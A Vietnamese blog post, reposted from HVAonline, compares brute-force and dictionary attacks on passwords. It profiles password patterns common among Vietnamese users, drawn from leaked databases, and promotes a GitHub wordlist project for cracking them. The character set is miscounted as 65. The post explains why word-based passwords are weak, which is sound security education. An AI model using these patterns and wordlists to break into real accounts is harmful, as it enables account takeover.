Password là bí mật, không ai biết được nó có độ dài bao nhiêu và tổ hợp từ những ký tự gì ngoài người sở hữu nó 

Người tấn công về mặt lý thuyết buộc phải thử “tất cả” các trường hợp có thể có của tổ hợp ký tự cho đến khi tìm ra tổ hợp đúng. Chính cái “tất cả” này làm cho password an toàn. Do năng lực tính toán là có “giới hạn” nên việc “mò” hết “tất cả” các tổ hợp sẽ tốn 1 thứ là “thời gian”. Nếu một password có thể đẩy việc mò ra nó tới một thời gian xa xôi trong tương lai ( tính bằng ngàn năm ) thì coi như nó thắng người tấn công vì người đó không thể chờ tới lúc mò ra được password. 

Để đẩy việc “mò” password tới một thời gian xa xôi trong tương lai người ta có 2 cách, dựa trên 2 thành tố cơ bản tạo thành password: độ dài password và độ dài bảng ký tự được sử dụng. 

Ví dụ: 

Với một bảng ký tự như sau: 

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

ta có tất cả 65 ký tự 

Ta tạo thành một mật khẩu: Hvaonline2013 

Có độ dài là 13 ký tự 

Vậy tôi có 369,720,589,101,871,000,000,000 tổ hợp 
Giả sử tôi có một máy tính với khả năng tạo 80,000,000 tổ hợp ký tự trên 1 giây. Thì tôi cần 

4,621,507,363,773,390 second (hoặc)
77,025,122,729,557 minutes (hoặc)
1,283,752,045,493 hours (hoặc)
53,489,668,562 days (hoặc)
1,782,988,952 months (hoặc)
148,582,413 years

Rất nhiều thiên niên kỷ trôi qua để làm công việc này. Do đó password này đạt được thứ lợi ích là “bảo mật” 

( Hãy nhớ các con số phía trên tôi tính, để lát nữa bạn thấy một điểm yếu khác của password khiến password có thể bị phá vỡ nhanh hơn trên kia. Bên cạnh đó tôi có viết một bài về cách tính số tổ hợp ký tự tại đây http://xnohat.blogspot.com/2011/06/cach-tinh-so-to-hop-mat-khau-can-phai.html ) 

Tóm lại, với kiểu tấn công Brute force password tôi sẽ chết già trước khi mò các mật khẩu có độ dài lớn. Và các password sẽ an toàn trước tôi. 

Tuy nhiên đời không như là mơ ! 

Dictionary Attack: 


Vấn đề của Brute Force Attack là việc “mò” hết “tất cả” các tổ hợp làm tôi “mất thời gian”. Thể nên kỹ thuật Dictionary Attack ra đời. Kỹ thuật này thay hành động “mò” vô tội vạ bằng hành động “đoán” có tính toán. 
Bạn có thể hiểu sơ sơ về phương thức tấn công này dựa vào cái tên của chính nó “Dictionary” tức “từ điển”, hay nói ngắn gọn bạn có một danh sách các tổ hợp ký tự có “khả năng cao” là password rồi mang dò coi trong cái danh sách đó có cái nào là password không. 

Từ khóa trong đoạn trên là “khả năng”. Chính xác thứ làm cho phương pháp tấn công này trở nên yếu ớt trước password là “khả năng” password nằm trong cái danh sách ( từ điển ) của bạn là “giới hạn”. Vì nếu bạn có một danh sách quá dài, “thời gian” để bạn dò hết danh sách đó cũng sẽ khiến bạn thua cái password nếu nó đẩy bạn tới một giới hạn thời gian xa xôi trong tương lai. Do đó việc cần làm ở đây là “đoán” về “cấu trúc” của password rồi từ đó hình thành một từ điển “ngắn gọn hơn” và có “khả năng cao hơn”. Ví dụ một số điểm có thể được coi là thành phần cấu trúc của password: 

-    Password có thể hình thành từ một cụm từ có nghĩa trong một ngôn ngữ cụ thể: Password có thể là một cụm từ tiếng Việt chẳng hạn, ví dụ: phucdeptrai 
-    Password có thể được đặt theo một thói quen: kiểu như 123456789, 987654321, 123456, 1234567, 12345678, matkhau, password, admin … 
-    Thành phần của password được hình thành theo một khuôn mẫu: ví dụ Xuanthanh2503 
Bằng việc dựa vào các khuôn mẫu nêu trên kèm với việc điều tra tính cách cá nhân người tạo Password, tôi có thể giới hạn danh sách password xuống thành một cái list khá gọn hơn. Ví dụ tôi nhận định một cái list tương đối phù hợp cho người Việt Nam sẽ bao gồm: 

-    Ngôn ngữ: tiếng Việt 
-    Tổ hợp từ có nghĩa 
-    Số từ trong mật khẩu: 2 hoặc 3 
-    Theo như tôi thống kê từ khá nhiều DB tôi tiếp cận được ( trong qua trình nghiên cứu, các DB này do các hacker vứt bừa bãi trên các diễn đàn mạng, tôi down về phân tích ). Các password được coi là “mạnh” ở Việt Nam thường có dạng: 
+ Cụm 2-3 tự tiếng Việt có nghĩa 
+ Chữ cái đầu viết hoa – 2 từ tiếng Việt có nghĩa – từ 3 đến 4 chữ số 
+ Ký tự @#$! - Chữ cái đầu viết hoa – 2 từ tiếng Việt có nghĩa – từ 3 đến 4 chữ số - Ký tự @#$! 

Với sự giới hạn lại trong các khuôn mẫu tôi cho rằng ( khá chủ quan ) khả năng password nằm trong danh sách của tôi đối với trường hợp người Việt tạo password là cao 

Một số tính toán: 

Tôi có một danh sách 1556 từ tiếng Việt đơn 

Password dự trù theo dạng Cụm 2-3 “từ” tiếng Việt có nghĩa thì tôi có tổng cộng 

3,767,287,616 tổ hợp “từ” 

Bạn sẽ thấy sự khác biệt ở đây là tôi có 3,767,287,616 tổ hợp “từ” chứ không phải tổ hợp “ký tự”, mà từ thì có thể dài tới 21 ký tự trong trường hợp password có 3 chữ “nghieng” ( từ dài nhất trong tiếng Việt ) 
Cũng với máy tính với sức tính toán như trên chúng ta sẽ cần: 

Alphabe Table    1,556    (Word, no number)   
Password length    3       
Total combination    3,767,287,616       
           
Computing Power    80,000,000    hash/s   
Time    47    second    (or)
    1    minutes (or)
    0    hours    (or)
    0    days    (or)
    0    months    (or)
    0    years


Chính xác là còn khoảng 47 giây để crack mật khẩu dài 21 kí tự ! ( khoảng 1 ngày cho 28 kí tự )

Điều cốt lõi ở đây là số tổ hợp “từ” sẽ ít hơn số tổ hợp “ký tự” do không gian tổ hợp bị thu hẹp xuống rất nhiều lần. Với một password 3 từ thì nó cũng không khác mấy khi so với một password 3 ký tự trong trường hợp này 

Vietnamese Password Dictionary (vipasswordict): 

Vấn đề khi thi triển kỹ thuật tấn công Dictionary Attack là ở Việt Nam chưa có một file từ điển nào được tổ hợp cho mục đích trên. Do đó tôi đang start một dự án nho nhỏ về tạo một vài bộ từ điển password dict cho ngôn ngữ Tiếng Việt. Sơ bộ thì sẽ có các bộ password dict: 

-    1556 Từ tiếng Việt đơn ( đã hoàn tất ): bộ từ này là bộ căn bản dùng để tổ hợp các bộ khác, là 1556 từ tiếng Việt không dấu và đơn nhất 
-    Tổ hợp 2 từ tiếng Việt ( đã hoàn tất ) 
-    Tổ hợp 3 từ tiếng Việt ( đã hoàn tất ): sau khi áp dụng grid computing thì hoàn tất mớ này trong 3 ngày chạy liên tục 
-    Tổ hợp 2 từ tiếng Việt – padding thêm 4 kí tự số ( 0000-9999) ( đã hoàn tất ): vì theo như tôi thống kê từ khá nhiều DB tôi tiếp cận được ( trong qua trình nghiên cứu, các DB này do các hacker vứt bừa bãi trên các diễn đàn mạng, tôi down về phân tích ). Các password được coi là “mạnh” ở Việt Nam thường có dạng “Xuanthanh2503” 
-    Tổ hợp 3 từ tiếng Việt – kí tự đầu viết hoa – padding thêm 4 kí tự số ( 0000-9999) ( chưa làm ) 

Hiện tôi đã có tạo một project trên GitHub và sẽ dần dần release từng bộ từ điển tôi tổ hợp xong lên đây 

https://github.com/xnohat/vipasswordict 

Tác giả: xnohat
Nguồn: HVAonline

Saturday, March 5, 2016

Blog này để toi chia sẻ thủ thuật về hacking hoặc vài thứ khác :)